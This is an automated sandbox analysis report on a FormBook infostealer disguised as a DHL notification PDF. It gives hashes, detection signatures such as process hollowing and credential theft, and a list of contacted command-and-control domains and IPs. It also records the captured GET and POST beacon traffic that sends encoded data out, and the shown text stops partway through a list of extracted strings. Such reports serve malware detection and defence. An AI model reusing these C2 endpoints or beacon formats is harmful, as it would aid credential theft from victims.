Windows Analysis Report
DHL_Notification_pdf.exe

Overview

General Information

Sample Name: DHL_Notification_pdf.exe
Analysis ID: 830435
MD5: 06f7894017e8f6737d228adc14480c83
SHA1: fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
SHA256: bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: DHL_Notification_pdf.exe ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe Virustotal: Detection: 46%
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd/hpb7/ Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.traindic.top/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/j Avira URL Cloud: Label: malware
Source: http://www.traindic.top Avira URL Cloud: Label: malware
Source: http://www.yongleproducts.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz Avira URL Cloud: Label: malware
Source: bohndigitaltech.com Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe ReversingLabs: Detection: 18%
Source: DHL_Notification_pdf.exe Joe Sandbox ML: detected
Source: 3.2.ldndbi.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.ldndbi.exe.5d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL_Notification_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Notification_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 4x nop then xor ebx, ebx 3_2_0040DCB4

Networking

Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50513 -> 8.8.8.8:53
Source: C:\Windows\explorer.exe DNS query: www.0dhy.xyz
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.46.160.97
Source: Joe Sandbox View IP Address: 67.222.24.48
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: pgoMAr2=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oN~SPhoMVu5fPFIIXoBXZzi-M.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: pgoMAr2=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCVS8wXZ(_KiAKu2Fld9bybaw.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: pgoMAr2=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRel0CXfuJcQ_Crzw5Epw2H~70.
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: pgoMAr2=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFV-FfFRqrfMfCXsEd6aLCGpE.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:29:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:47 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:50 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 10:30:05 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:30:13 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:30:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000002.523730403.0000000014FCA000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.00000000056BA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kunimi.org/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsC
Source: DHL_Notification_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.523730403.00000000157A4000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.0000000005E94000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.0dhy.xyz
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.0dhy.xyz/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.club
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.club/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.clubReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfdReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com/hpb7/:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.comReferer:
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.com
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com/hpb7/:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.comReferer:
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ru
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ru/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ruReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org/hpb7/I
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.com
